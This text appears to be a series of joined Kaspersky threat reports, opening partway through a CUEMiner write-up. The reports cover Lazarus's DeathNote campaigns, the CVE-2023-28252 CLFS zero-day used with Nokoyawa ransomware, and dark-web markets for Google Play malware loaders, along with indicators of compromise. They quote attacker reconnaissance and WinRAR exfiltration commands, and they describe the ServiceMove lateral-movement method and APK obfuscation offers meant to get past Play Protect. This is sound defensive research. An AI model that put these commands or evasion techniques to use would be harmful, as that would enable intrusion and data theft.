• Fetches configuration details from a hardcoded URL and saves it at different places (for example, c:\logs.uce, %localappdata%\logs.uce).
• Creates empty files and subdirectories in %ProgramData%\HostData to make the directory look benign.
• Downloads the miner and watcher.
• Does a number of other things. The full list you can find in our private report.

The watcher, as the name suggests, monitors the system. If it doesn’t detect any processes that consume lots of system power (for example, games), the miner software is launched. When a heavy process, such as a game, is started, the miner is stopped and only started again when the aforementioned process stops. This is done in order to stay undetected on the system longer.

Conclusion

Open source malware is often used by less skilled cybercriminals. They often lack the required skills and contacts to conduct massive campaigns. Nevertheless, they can be still quite active and effective, as is shown by the huge number of CUEMiner samples we detected. If along their cybercriminal career they gain more skills, such as programming and understanding security better, they often reuse and improve crucial source code parts from open source malware.

Code reuse and rebranding is also used quite often by cybercriminals. There are many ransomware variants that change names over time while mostly containing the same code base. In other cases, cybercriminals re-use parts of the code in new campaigns. For example, Rhadamantys stealer features some code overlaps with the Hidden Bee malware. This suggests involvement of at least one individual in the Rhadamantys campaign who had also been involved in the development of Hidden Bee.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals or have questions about our private reports, please contact crimewareintel@kaspersky.com.

The Lazarus group is a high-profile Korean-speaking threat actor with multiple sub-campaigns. We have previously published information about the connections of each cluster of this group. In this blog, we’ll focus on an active cluster that we dubbed DeathNote because the malware responsible for downloading additional payloads is named Dn.dll or Dn64.dll. This threat is also known as Operation DreamJob or NukeSped. Over the past few years, we have closely monitored the DeathNote cluster, observing a shift in their targets as well as the development and refinement of their tools, techniques, and procedures.

Timeline of DeathNote cluster

In this blog, we will provide an overview of the significant modifications that have taken place within this cluster, both in terms of its technical and strategic aspects.

Beginning of tracking DeathNote

The notorious threat actor Lazarus has persistently targeted cryptocurrency-related businesses for a long time. While monitoring the actor’s activities, we noticed that in one particular case they were using a significantly modified piece of malware. In mid-October 2019, we came across a suspicious document uploaded to VirusTotal. Upon further investigation, we discovered that the actor behind this weaponized document had been using similar malicious Word documents since October 2018. The malware author used decoy documents that were related to the cryptocurrency business such as a questionnaire about buying specific cryptocurrency, an introduction to a specific cryptocurrency, and an introduction to a bitcoin mining company.

Decoy documents

Once the victim opens the document and enables the macro, the malicious Visual Basic Script extracts the embedded downloader malware and loads it with specific parameters. In this initial discovery, the actor used two types of second-stage payload. The first is a manipulated piece of software that contains a malicious backdoor, while the second is a typical backdoor with a multi-stage binary infection process.

Infection procedure

The Trojanized application utilized in the second stage is masquerading as a genuine UltraVNC viewer. If executed without any command line parameters, it will display a legitimate UltraVNC viewer window. However, it carries out a malicious routine when it is spawned with “-s {F9BK1K0A-KQ9B-2PVH-5YKV-IY2JLT37QQCJ}” parameters. The other infection method executes the installer, which creates and registers an injector and backdoor in a Windows service. Finally, the backdoor is injected into a legitimate process (svchost.exe) and initiates a command-and-control (C2) operation. In this infection, the final payload injected into the legitimate process was Manuscrypt. Until this discovery, the Lazarus group had primarily targeted the cryptocurrency business. Our investigation has identified potential compromises of individuals or companies involved in cryptocurrency in Cyprus, the United States, Taiwan and Hong Kong.

Shifting focus to the defense industry

While tracking this campaign, we uncovered a significant shift in the attack’s target along with updated infection vectors in April 2020. Our research showed that the DeathNote cluster was used to target the automotive and academic sectors in Eastern Europe, both of which are connected to the defense industry. At this point, the actor switched all the decoy documents to job descriptions related to defense contractors and diplomatic services.

Decoy documents

In addition, the actor refined its infection chain, using the remote template injection technique in their weaponized documents, as well as utilizing Trojanized open-source PDF viewer software. Both of these infection methods result in the same malware (DeathNote downloader), which is responsible for uploading the victim’s information and retrieving the next-stage payload at the C2’s discretion. Finally, a COPPERHEDGE variant is executed in memory.

Infection chain

Notably, a Trojanized PDF reader, based on the open source software, used an interesting technique to initiate its malicious routine. It first retrieves the MD5 hash of the opened PDF file and performs an XOR operation on 65 bytes of embedded data using the retrieved MD5 value. Next, it verifies that the first WORD value of the XORed data is 0x4682, and checks that the MD5 hash value matches the last 16 bytes of the XORed data. If both conditions are met, the remaining 47-bytes value is used as the decryption key for the next stage of infection.

Verification process of Trojanized PDF reader

Finally, this Trojanized PDF viewer overwrites the original opened file with a decoy PDF file and opens it to deceive the victim while implementing the malware payload. The payload is executed with command line parameters, and a shortcut file is created in the Startup folder to ensure persistence. This infection mechanism demonstrates the care and precision with which the actor delivers the payload.

Expanded target and adoption of new infection vector

In May 2021, we observed that an IT company in Europe that provides solutions for monitoring network devices and servers was compromised by the same cluster. It’s believed that the Lazarus group had an interest in this company’s widely used software or its supply chain.

In addition, in early June 2021, the Lazarus group began utilizing a new infection mechanism against targets in South Korea. One thing that caught our attention was that the initial stage of the malware was executed by legitimate security software that is widely used in South Korea. It’s thought that the malware was spread through a vulnerability in this widely used software in South Korea.

Infection chain

Similar to the previous case, the initial infection vector created the downloader malware. Once connected to the C2 server, the downloader retrieved an additional payload based on the operator’s commands and executed it in memory. During this time, the BLINDINGCAN malware was used as a memory-resident backdoor. While the BLINDINGCAN malware has sufficient capabilities to control the victim, the actor manually implanted additional malware. It’s believed that the group aims to create an auxiliary method to control the victim. The retrieved loader’s export function (CMS_ContentInfo) was launched with command line parameters, which is crucial for decrypting the embedded next-stage payload and configuration. This process only proceeds if the length of the parameter is 38. Finally, the COPPERHEDGE malware, previously used by this cluster, was executed on the victim.

Almost one year later, in March 2022, we discovered that the same security program had been exploited to propagate similar downloader malware to several victims in South Korea. However, a different payload was delivered in this case. The C2 operator manually implanted a backdoor twice, and although we were unable to acquire the initially implanted backdoor, we assume it is the same as the backdoor in the following stage. The newly implanted backdoor is capable of executing a retrieved payload with named-pipe communication. In addition, the actor utilized side-loading to execute Mimikatz and used stealer malware to collect keystroke and clipboard data from users.

Infection chain

Around the same time, we uncovered evidence that one defense contractor in Latin America was compromised by the same backdoor. The initial infection vector was similar to what we’ve seen with other defense industry targets, involving the use of a Trojanized PDF reader with a crafted PDF file. However, in this particular case, the actor adopted a side-loading technique to execute the final payload. When the malicious PDF file is opened with the Trojanized PDF reader, the victim is presented with the same malware mentioned above, which is responsible for collecting and reporting the victim’s information, retrieving commands and executing them using pipe communication mechanisms. The actor used this malware to implant additional payloads, including legitimate files for side-loading purposes.

• Legitimate file: %APPDATA%\USOShared\CameraSettingsUIHost.exe
• Malicious file: %APPDATA%\USOShared\dui70.dll
• Config file: %APPDATA%\USOShared\4800-84dc-063a6a41c5c
• Command line: %APPDATA%\USOShared\CameraSettingsUIHost.exe uTYNkfKxHiZrx3KJ

An ongoing attack targeting a defense contractor with updated infection tactics

In July 2022, we observed that the Lazarus group had successfully breached a defense contractor in Africa. The initial infection was a suspicious PDF application, which had been sent via the Skype messenger. After executing the PDF reader, it created both a legitimate file (CameraSettingsUIHost.exe) and malicious file (DUI70.dll) in the same directory. This attack heavily relied on the same DLL side-loading technique that we observed in the previous case. The payload that was initially implanted and executed by the PDF reader was responsible for collecting and reporting the victim’s information, as well as retrieving an additional payload from the remote server named LPEClient. The Lazarus group used this malware several times in various campaigns. They have also utilized the same DLL side-loading technique to implant additional malware that is capable of backdoor operation. In order to move laterally across systems, the actor used an interesting technique called ServiceMove. This technique leverages the Windows Perception Simulation Service to load arbitrary DLL files. According to the author’s explanation, ‘a non-existing DLL file will be loaded every time when the Windows Perception Simulation Service is started’. By creating an arbitrary DLL in C:\Windows\System32\PerceptionSimulation\ and starting the service remotely, the actors were able to achieve code execution as NT AUTHORITY\SYSTEM on a remote system. The actor created a devobj.dll file in the PerceptionSimulation folder and remotely executed the PerceptionSimulation service. Upon launching the devobj.dll file, it decrypted an encrypted backdoor file, PercepXml.dat, from the same folder and executed it in memory.

Infection chain

Post-exploitation

During our investigation of this campaign, we have gained extensive insight into the Lazarus group’s post-exploitation strategy. After initial infection, the operator executed numerous Windows commands to gather basic system information and attempt to find valuable hosts, such as an Active Directory server. Before moving laterally, the Lazarus group acquired Windows credentials using well-known methods, and employed public techniques, such as ServiceMove. When the group completed its mission and began exfiltrating data, they mostly utilized the WinRAR utility to compress files and transmit them via C2 communication channels.

Phase Examples Basic reconnaissance Generally used Windows commands. For example:

• cmd.exe /c netstat -ano | find TCP
• systeminfo

In one case, they accessed the default domain controllers policy directly.

• cmd.exe /c “Type “\\[redacted]\SYSVOL\[redacted]\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf”

Finding high-value hosts To find a connected Remote Desktop host it utilized Windows commands or queried the saved server list from the registry.

• cmd.exe /c netstat -ano | findstr 3389
• cmd.exe /c reg query HKEY_USERS\S-1-5-[redacted]-1001\Software\Microsoft\Terminal Server Client\Servers

Utilizing ADFind tool to acquire Active directory information.

• cmd.exe /c “%appdata%\[redacted].xic -b dc=[redacted],dc=[redacted] -f “sAMAccountName=[redacted]” >> %temp%\dm3349.tmp 2>&1″

Acquiring login credentials Utilizing crafted Mimikatz to dump login credentials or Responder tool to capture credentials. Lateral movement One common approach for launching commands on remote hosts is to use methods like SMB connection or the ServiceMove technique. Exfiltration Using WinRAR to archive files before sending the stolen file via C2 channel.

• adobearm.exe a -hp1q2w3e4 -m5 -v2000000k “%Local AppData%\Adobe\SYSVOL800.CHK” “\\[redacted]FILE02.[redacted]\Projects\[redacted] Concept Demonstrator”
• %appdata%\USOShared\USOShared.LOG1 a -hpb61de03de6e0451e834db6f185522bff -m5 “%appdata%\USOShared\USOShared.LOG2” “%appdata%\ntuser.001.dat”

Attribution

After tracking the DeathNote cluster and its origin, we have determined that the Lazarus group is responsible for this malware strain. Our conclusion is supported by many security vendors who also believe that the Lazarus group is linked to this malware. Furthermore, we have analyzed the delivery of Windows commands to the victim through the DeathNote malware, and discovered that a significant number of commands were executed between GMT 00:00 and 07:00. Based on our knowledge of normal working hours, we can infer that the actor is located in either the GMT+08 or GMT+09 time zone.

Timeline of Windows commands

Moreover, the actor left a Korean comment ‘정상호출’, which translates to ‘normal call’ in the C2 script. This further supports the hypothesis that Lazarus is a Korean-speaking actor.

Korean comment in the C2 script

In conclusion, the Lazarus group is a notorious and highly skilled threat actor. Our analysis of the DeathNote cluster reveals a rapid evolution in its tactics, techniques and procedures over the years. As the Lazarus group continues to refine its approaches, it is crucial for organizations to maintain vigilance and take proactive measures to defend against its malicious activities. By staying informed and implementing strong security measures, organizations can reduce the risk of falling victim to this dangerous adversary.

Indicators of Compromise Beginning of tracking DeathNote

Malicious documents
265f407a157ab0ed017dd18cae0352ae
7a73a2261e20bdb8d24a4fb252801db7
7a307c57ec33a23ce9b5c84659f133cc
ced38b728470c63abcf4db013b09cff7
9121f1c13955506e33894ffd780940cd
50b2154de64724a2a930904354b5d77d
8a05f6b3f1eb25bcbceb717aa49999cd
ee73a772b72a5f3393d4bf577fc48efe

Downloader
d1c652b4192857cb08907f0ba1790976
25b37c971fd7e9e50e45691aa86e5f0a
0493f40628995ae1b7e3ffacd675ba5f
8840f6d2175683c7ed8ac2333c78451a
c278d6468896af3699e058786a8c3d62
9fd35bad075c2c70678c65c788b91bc3
59cb8474930ae7ea45b626443e01b66d
7af59d16cfd0802144795ca496e8111c
cd5357d1045948ba62710ad8128ae282
77194024294f4fd7a4011737861cce3c
e9d89d1364bd73327e266d673d6c8acf
0d4bdfec1e657d6c6260c42ffdbb8cab
5da86adeec6ce4556f477d9795e73e90
706e55af384e1d8483d2748107cbd57c

Manipulated Installer
dd185e2bb02b21e59fb958a4e12689a7

Installer
4088946632e75498d9c478da782aa880 C:\Windows\igfxmon.exe

Injector
dc9244206e72a04d30eeadef23713778 C:\Windows\system32\[random 2 bytes]proc.exe

Backdoor
735afcd0f6821cbd3a2db510ea8feb22 C:\Windows\system32\[random 2 bytes]svc.dll

Shifting focus to the defense industry

Malicious documents
4c239a926676087e31d82e79e838ced1 pubmaterial.docx
183ad96b931733ad37bb627a958837db Boeing_PMS.docx
9ea365c1714eb500e5f4a749a3ed0fe7 Boeing_DSS_SE.docx
2449f61195e39f6264d4244dfa1d1613 Senior_Design_Engineer.docx
880b263b4fd5de0ae6224189ea611023 LM_IFG_536R.docx.docx
e7aa0237fc3db67a96ebd877806a2c88 Boeing_AERO_GS.docx
56470e113479eacda081c2eeead153bf boeing_spectrolab.docx

Fetched template
2efbe6901fc3f479bc32aaf13ce8cf12 pubmaterial.dotm
65df11dea0c1d0f0304b376787e65ccb 43.dotm
0071b20d27a24ae1e474145b8efc9718 17.dotm
1f254dd0b85edd7e11339681979e3ad6 61.dotm

DeathNote downloader
f4b55da7870e9ecd5f3f565f40490996 onenote.db, thumbnail.db
2b02465b65024336a9e15d7f34c1f5d9 wsuser.db
11fdc0be9d85b4ff1faf5ca33cc272ed onenote.db
f6d6f3580160cd29b285edf7d0c647ce
78d42cedb0c012c62ef5be620c200d43 wsuser.db
92657b98c2b4ee4e8fa1b83921003c74
075fba0c098d86d9f22b8ea8c3033207 wsdts.db
8fc7b0764541225e5505fa93a7376df4
7d204793e75bb49d857bf4dbc60792d3 2.dll
eb2dc282ad3ab29c1853d4f6d09bec4f
ca6658852480c70118feba12eb1be880 thumbnail.db
c0a8483b836efdbae190cc069129d5c3 wsdts.db
14d79cd918b4f610c1a6d43cadeeff7b wsuser.db
1bd0ca304cdecfa3bd4342b261285a72

Trojanized PDF viewer
cbc559ea38d940bf0b8307761ee4d67b SumatraPDF.exe
da1dc5d41de5f241cabd7f79fbc407f5 internal pdf viewer.exe

Expanded target and adoption of new infection vector

Racket Downloader
b3a8c88297daecdb9b0ac54a3c107797 SCSKAppLink.dll

BLIDINGCAN
b23b0de308e55cbf14179d59adee5fcb
64e5acf43613cd10e96174f36cb1d680

COPPERHEDGE Loader
a43bdc197d6a273102e90cdc0983b0b9

COPPERHEDGE
97336f5ce811d76b28e23280fa7320b5

Downloader Loader
f821ca4672851f02bead3c4bd23bed84 c:\officecache\officecert.ocx

Racket Downloader
b974bc9e6f375f301ae2f75d1e8b6783 %public%\Libraries\SCSKAppLink.dll
eb061dfacb3667cf65d250911179235d

Stealer
fe549a0185813e4e624104d857f9277b %ProgramData%\GenICam\GenICamKDR.gic

Backdoor Loader
7b8960e2a22c8321789f107a7b83aa59 %ProgramData%\xilinx\xilinx.pkg
0ac90c7ad1be57f705e3c42380cbcccd %ProgramData%\USOShared\USOShare.cpl

Mimikatz Loader
adf0d4bbefccf342493e02538155e611 %ProgramData%\USOShared\log.dll
d4d654c1b27ab90d2af8585052c77f33

An ongoing attack targeting a defense contractor with updated infection tactics

Loader
2bcf464a333d67afeb80360da4dfd5bb C:\Windows\system32\perceptionsimulation\devobj.dll
83dd9b600ed33682aa21f038380a6eab C:\Windows\system32\perceptionsimulation\devobj.dll

ForestTiger(Backdoor)
97524091ac21c327bc783fa5ffe9cd66 ProgramData\adobe\arm\lockhostingframework.dll
9b09ebf52660a9d6deca21965ce52ca1 %appdata%\adobe\arm\DUI70.dll
26c0f0ce33f5088754d88a1db1e6c4a9

Trojanized PDF reader
84cd4d896748e2d52e2e22d1a4b9ee46 SecurePDF.exe

In February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East, in North America, and previously in Asia regions. These exploits were very similar to already known Common Log File System (CLFS) driver exploits that we analyzed previously, but we decided to double check and it was worth it – one of the exploits turned out to be a zero-day, supporting different versions and builds of Windows, including Windows 11. The exploit was highly obfuscated with more than 80% of the its code being “junk” elegantly compiled into the binary, but we quickly fully reverse-engineered it and reported our findings to Microsoft. Microsoft assigned CVE-2023-28252 to the Common Log File System elevation-of-privilege vulnerability, and a patch was released on April 11, 2023, as part of April Patch Tuesday.

While the majority of zero-days that we’ve discovered in the past were used by APTs, this particular zero-day was used by a sophisticated cybercrime group that carries out ransomware attacks. This group is notable for its use of a large number of similar but unique Common Log File System (CLFS) driver exploits that were likely developed by the same exploit author. Since at least June 2022, we’ve identified five different exploits used in attacks on retail & wholesale, energy, manufacturing, healthcare, software development and other industries. Using the CVE-2023-28252 zero-day, this group attempted to deploy the Nokoyawa ransomware as a final payload.

Nokoyawa ransom note

Elevation-of-privilege exploit

The attacker must be authenticated with user access and have the ability to run code on the target system to launch the elevation-of-privilege exploit.

CLFS is a log file subsystem that was first introduced in Microsoft Windows Server 2003 R2 / Microsoft Vista and is implemented in the clfs.sys driver. This file system can be used by any application and Microsoft provides an API for it. Logs are created using the CreateLogFile function – a log is made up of a base log file (.blf file name extension) that is a master file containing metadata, and a number of containers that hold the actual data. Containers are created using the AddLogContainer and AddLogContainerSet functions. As you may already guess, the base log files are the most interesting to look at. But while Microsoft provides an API for working with them, their file format is undocumented, and developers should interact with them only through the CLFS API. The file structure of base log files, when viewed briefly in a hex editor, does not seem very complicated, and Microsoft provides debug symbols for clfs.sys, so with a sufficient level of enthusiasm this format can be reverse engineered (already done by Alex Ionescu). A glance at the structure of base log files instantly raises a red flag – the file consists of kernel structures as it is, and there are even fields for storing memory pointers! Combine that with the fact that, according to the API documentation, this technology is quite complicated, plus it was developed a long time ago, and we have a large number of vulnerabilities as a result. Searching for “Windows Common Log File System Driver Elevation Of Privilege Vulnerability” shows that there have been at least thirty-two such vulnerabilities (not counting CVE-2023-28252) discovered since 2018, where three of them were detected in the wild as zero-days (CVE-2022-24521, CVE-2022-37969, CVE-2023-23376).

CVE-2023-28252 is an out-of-bounds write (increment) vulnerability that can be exploited when the system attempts to extend the metadata block. The vulnerability gets triggered by the manipulation of the base log file. Right now, we will not share any additional details about the vulnerability and how to trigger it, as this information can be used as a double-edged sword. This is to ensure that everyone has enough time to patch their systems before other actors develop exploits for CVE-2023-28252. We will update this article with details about the vulnerability nine days after April Patch Tuesday.

The discovered exploit uses the vulnerability to corrupt another specially crafted base log file object in a way that a fake element of the base log file gets treated as a real one. _CLFS_CONTAINER_CONTEXT is an example of the structure that gets stored in base log files, but contains a field for storing a kernel pointer. Of course, the value of this field is ignored when the structure is read from the base log file on disk, but changing in memory the offset pointing to the valid _CLFS_CONTAINER_CONTEXT structure into an offset pointing to a specially crafted malicious _CLFS_CONTAINER_CONTEXT structure makes it possible to provide a pointer to a controlled memory in a user level and obtain kernel read/write privileges with it.

The exploit leaks the addresses of kernel objects to achieve stable exploitation. This is done using the NtQuerySystemInformation function – a technique that we previously saw in other zero-days (e.g. PuzzleMaker, MysterySnail APT cases). The information classes used by the exploit require Medium IL to work.

We believe that CVE-2023-28252 could have been easily discovered with the help of fuzzing. But there are already so many vulnerabilities found in this component, so if it’s discoverable by fuzzing, why has it not been found before? We have a possible explanation. Examining the clfs.sys driver code in disassembler shows extensive use of try/catch blocks to catch exceptions. In many parts of the code when an exception occurs it gets masked by an exception handler and the code continues its normal execution like nothing happened. We verified that with CVE-2023-28252 a possible access violation that follows after triggering the vulnerability is masked by an exception handler. This makes us think that previously fuzzers were actually hitting this vulnerability, but because there was no crash it continued to be undiscovered. For effective fuzzing, it’s necessary to keep in mind the possibility of such a scenario and to take steps to prevent it.

Post exploitation and malware

We see that the main purpose of using elevation-of-privilege exploits was to dump the contents of the HKEY_LOCAL_MACHINE\SAM registry hive.

As for the malware, attackers use Cobalt Strike BEACON as their main tool. It’s launched with a variety of custom loaders aimed to prevent AV detection.

In some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim’s machines were infected with a custom modular backdoor named “Pipemagic” that gets launched via an MSBuild script. At the end of last year, we published a private report about this malware for customers of the Kaspersky Intelligence Reporting service.

In attacks using the CVE-2023-28252 zero-day, this group attempted to deploy Nokoyawa ransomware as a final payload. Yearly variants of Nokoyawa were just “rebranded” variants of JSWorm ransomware, which we wrote about previously. In this attack, cybercriminals used a newer version of Nokoyawa that is quite distinct from the JSWorm codebase. It’s written in C and has encrypted strings. It was launched with an encrypted json config provided with a “–config” command line argument.

Decrypted and formatted config of Nokoyawa ransomware

Conclusions

We see a significantly increasing level of sophistication among cybercriminal groups. We don’t often see APTs using zero-day exploits in their attacks, and now there are financially motivated cybercriminal groups that have the resources to acquire exploits for unknown vulnerabilities and routinely use them in attacks. Moreover, there are developers willing to help cybercriminal groups and to produce one exploit after another.

We detect the CVE-2023-28252 exploit and related malware with the verdicts:

• PDM:Exploit.Win32.Generic
• PDM:Trojan.Win32.Generic
• HEUR:Trojan-Ransom.Win32.Generic
• Win64.Agent*

Kaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. CVE-2023-28252 is the latest addition to the long list of zero-days discovered in the wild with the help of our technologies. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.

More information about this and related attacks is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.

Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.

Indicators of compromise

After finishing, the exploit leaves files used for exploitation at the hard-coded path in the “C:\Users\Public\” folder. Companies can check if the exploit was launched on their servers or employees’ machines by looking for the presence of the “C:\Users\Public\.container*”, “C:\Users\Public\MyLog*.blf”, and “C:\Users\Public\p_*” files.

Exploitation artifacts
C:\Users\Public\.container*
C:\Users\Public\MyLog*.blf
C:\Users\Public\p_*

Exploit
46168ed7dbe33ffc4179974f8bf401aa

CobaltStrike loaders
1e4dd35b16ddc59c1ecf240c22b8a4c4
f23be19024fcc7c8f885dfa16634e6e7
a2313d7fdb2f8f5e5c1962e22b504a17

CobaltStrike C2s
vnssinc[.]com
qooqle[.]top
vsexec[.]com
devsetgroup[.]com

Nokoyawa ransomware
8800e6f1501f69a0a04ce709e9fa251c

In 2022, Kaspersky security solutions detected 1,661,743 malware or unwanted software installers, targeting mobile users. Although the most common way of distributing such installers is through third-party websites and dubious app stores, their authors every now and then manage to upload them to official stores, such as Google Play. These are usually policed vigorously, and apps are pre-moderated before being published; however, the authors of malicious and unwanted software employ a variety of tricks to bypass platform checks. For instance, they may upload a benign application, then update it with malicious or dubious code infecting both new users and those who have already installed the app. Malicious apps get removed from Google Play as soon as they are found, but sometimes after having been downloaded a number of times.

With many examples of malicious and unwanted apps on Google Play being discovered after complaints from users, we decided to take a look at what the supply and demand of such malware on the dark web looks like. It is especially important to analyze how this threat originates, because many cybercriminals work in teams, buying and selling Google Play accounts, malware, advertising services, and more. It’s a whole underground world with its own rules, market prices, and reputational institutions, an overview of which we present in this report.

Methodology

Using Kaspersky Digital Footprint Intelligence, we were able to collect examples of offers of Google Play threats for sale. Kaspersky Digital Footprint Intelligence allows discreet monitoring of pastebin sites and restricted underground online forums to discover compromised accounts and information leakages. The offers presented in this report were published between 2019 and 2023 and were collected from the nine most popular forums for the purchase and sale of goods and services related to malware and unwanted software.

Key findings

• The price of a loader able to deliver a malicious or unwanted app to Google Play ranges between $2,000 and $20,000.
• To keep their activities low-profile, a large percentage of attackers negotiate strictly through personal messages on forums and messengers, for example, in Telegram.
• The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners and even dating apps.
• Cybercriminals accept three main kinds of payment: a percentage of the final profit, subscription or rent, and one-time payment.
• Cybercriminals offer to launch Google ads to attract more people to download malicious and unwanted apps. The cost of ads depends on the target country. Ads for users from the USA and Australia cost the most — up to about $1 (US).

Types of malicious services offered on the dark web

As on legitimate online marketplaces, there are also various offers on the dark web for customers with different needs and budgets. In the screenshot below, you can see an offer list, which gives an overview of the number of different goods and services that may be needed to target Google Play users. The author of the list calls the prices too high; however, they do not contradict the prices we’ve seen in other dark web offers. The main products that attackers buy are developers’ Google Play accounts that can be either hacked or registered by cybercriminals using stolen identities, as well as source code of various tools that help the buyer to upload their creations to Google Play. Also, such services as VPS (for $300), or Virtual Private Server, which the attackers use to control infected phones or to redirect user traffic, as well as web-based injections are offered. A web injection is malicious functionality that monitors the victim’s activity, and if they open a web page that is of interest to the cybercriminals, an injector replaces it with a malicious one. Such a feature is offered for $25–80 apiece.

A dark web service provider calls these prices too high, and indicates that they sell the same services cheaper

See translation

Here are the real product prices and how much money you need if you don’t choose me

1. GP developer account ~ $60
2. App source or expenses on merging a loader and an existing APK $4000 rent $20000 purchase
3. VPS for the panel ~ $300
4. VPS-proxy to redirect traffic ~ $100–300
5. Domains ~ $5 per domain
6. Loader development or rent ~ $2500–5000
7. Bot development or rent ~ $1000–20,000
8. Purchase or development of necessary web injections ~ $25–80 per injection. The more injections you have, the more you get from the installations
9. Regular bot/loader cleanup (FUD) ~$300, encryption in online services ~$200
10. Installations:
    • Traffic purchase for the GP loader
    • Installations purchase ~$1/installation; you can start with 300 installations to warm up the loader and assess their persistence => $300
    • Direct messaging
    • Email spam (forget about APK being undetectable)

Let’s take a look at some specific programs and services that cybercriminals offer for sale.

Google Play loaders

In most of the offers we analyzed, attackers sell Google Play loaders, programs whose purpose is to inject malicious or unwanted code into a Google Play app. This app is then updated on Google Play, and the victim may download the malicious update onto their phone. Depending on what exactly was injected into the app, the user may obtain the final payload with the update or get a notification prompting them to enable installation of unknown apps and install it from an external source. In the latter case, until the user agrees to install the additional app, the notification does not disappear. After installing the app, the user is asked for permissions to access key data from the phone, such as Accessibility Services, camera, microphone, etc. The victim may not be able to use the original legitimate app until they give the permissions required to perform malicious activities. Once all the requested permissions are granted, the user is finally able to use the app’s legitimate features, but at the same moment their devices become infected.

To convince the buyer to purchase their loaders, cybercriminals sometimes offer to provide a video demonstration, as well as to send a demo version to the potential client. Among the loader features, their authors may highlight the user-friendly UI design, convenient control panel, victim country filter, support for the latest Android versions, and more. Cybercriminals may also supplement the trojanized app with functionality for detecting a debugger or sandbox environment. If a suspicious environment is detected, the loader may stop its operations, or notify the cybercriminal that it has likely been discovered by security investigators.

Google Play loaders are the most popular offer on the dark web among Google Play threats

Often loader authors specify the types of legitimate apps their loaders work with. Malware and unwanted software is frequently injected into cryptocurrency trackers, financial apps, QR-code scanners and even dating apps. Cybercriminals also highlight how many downloads the legitimate version of the target app has, which means how many potential victims can be infected by updating the app with malicious or unwanted code. Most frequently, sellers promise to inject code into an app with 5,000 downloads or more.

Cybercriminals sell a Google Play loader injecting code into a cryptocurrency tracker

Binding service

Another frequent offer on the dark web is binding services. In essence, these do exactly the same thing that Google Play loaders do — hide a malicious or unwanted APK file in a legitimate application. However, unlike a loader, which adapts the injected code to pass the security checks on Google Play, a binding service inserts malicious code into an app that is not necessarily suitable for the official Android marketplace. Often, malicious and unwanted apps created with a binding service are distributed through phishing texts, dubious websites with cracked games and software, and more.

As binding services have a lower successful installation rate than loaders, the two differ greatly in price: a loader can cost about $5,000, while a binding service usually costs about $50–$100 or $65 per file.

Seller’s description of a binding service

See translation

We present for your consideration an APK binding service.

What is APK binding for? In a nutshell, binding allows attackers to install a bot to gain more trust from the victim, who is loyal to the legitimate app that the Android bot is bound to.

In creating this binding service, our main goal was to create a universal binder that would allow binding an Android bot to any legitimate application.

The main condition for enabling binding is the possibility to decompile a legitimate app and then compile it back using apktool.

Our binder’s main ADVANTAGES:

• Runtime/scantime FUD

  Runtime cleanness is achieved by encrypting the Android bot with our cryptor BEFORE binding. It is also clear of alerts from Google Protect and built-in antivirus on devices from different vendors.

• Most recent Android version support

  The binder is compatible with Android 7 and higher

• Dynamic bot launch

  What is it for? After a successful installation, the victim may tap Done instead of Open, and such installation is of no use. The binder dynamically launches the bot, no matter what the victim taps.

The binder’s main operating principle is that when the legitimate application is launched, it prompts the user to allow installation from unknown sources on a timer using social engineering, so that the bot can be installed. If the user rejects this, they receive another request after some time. Upon successful installation, the binder dynamically launches the bot.

This service is provided manually via jabber.

The advantages and features of binding services listed in sellers’ ads are often similar to those of loaders. Binders usually lack Google Play-related features, though.

Malware obfuscation

The purpose of malware obfuscation is to bypass security systems by complicating malicious code. In this case, the buyer pays either for processing a single application, or for a subscription, for example, once per month. The service provider may even offer discounts for the purchase of packages. For example, one of the sellers offers obfuscation of 50 files for $440, while the cost of processing only one file by the same provider is about $30.

Google Play threat obfuscation offer for $50 apiece

See translation

Hi everyone,

We obfuscate your APK files, so Google Play Protect lets them pass (allowlist certificate).

[IMG link]

This is not our case.

We are now working in manual test mode, later the process will be fully automated.

We offer:

• manifest morph (packagename, random activitis, class, etc)
• text string morph on the Smali code level (encryption with random key with Base encoding)
• resource name morph (optional)
• manifest and code part obfuscation on the Smali code level
• complicated trash Smali opcode generation (optional)
• trusted certificate accepted by Google Play Protect

Output:

• antivirus check scan to monitor possible false positives
• encrypted APK

Price:

1 file – $50

Service plans will be available when the site and API are ready

Payment accepted in BTC only

Contacts:

• email
• PM

Restrictions:

• APK max size – 5MB
• Important! Uploading files obfuscated by our service to VirusTotal is prohibited (checking via hash).
• Important! The service doesn’t support apps that can damage CIS users (strings are automatically checked against a denylist)
• Important! The service has the right to refuse app obfuscation without any explanation
• Important! The service has the right to review the prices in the future

Installations

To increase the number of downloads of a malicious app, many attackers offer to purchase installations by increasing app traffic through Google ads. Unlike other dark web offers, this service is completely legitimate and is used to attract as many downloads of the application as possible, no matter if it is a still-legitimate application or an already poisoned one. Installation costs depend on the targeted country. The average price is $0.5, with offers ranging from $0.1 to $1. In the screenshot below, ads for users from the USA and Australia cost the most — $0.8.

Seller specifies the installation price for each country

See translation

Increase installations of your Android app from Play Market through Google Ads (UAC).
Other services

Dark web sellers also offer to publish the malicious or unwanted app for the buyer. In this case, the buyer does not interact directly with Google Play, but can remotely receive the fruits of the app’s activity, for example, all victim data stolen by it.

Average prices and common rules of sale

Kaspersky experts analyzed the prices in dark web ads offering Google Play-related services, and found that fraudsters accept different payment methods. The services can be provided for a share of the final profit, rented, or sold for a one-time price. Some sellers also hold auctions of their goods: since the number of items sold is limited, they are not very likely to be discovered, so buyers may be willing to compete for them. For example, in one of the auctions we found, the bidding for a Google Play loader started at $1,500, the bid increment (step) was equal to $200, and the “blitz” — the instant purchase price — was $7,000.

Cybercriminals auction a Google Play loader

See translation

Google Play Loader source, ver №2

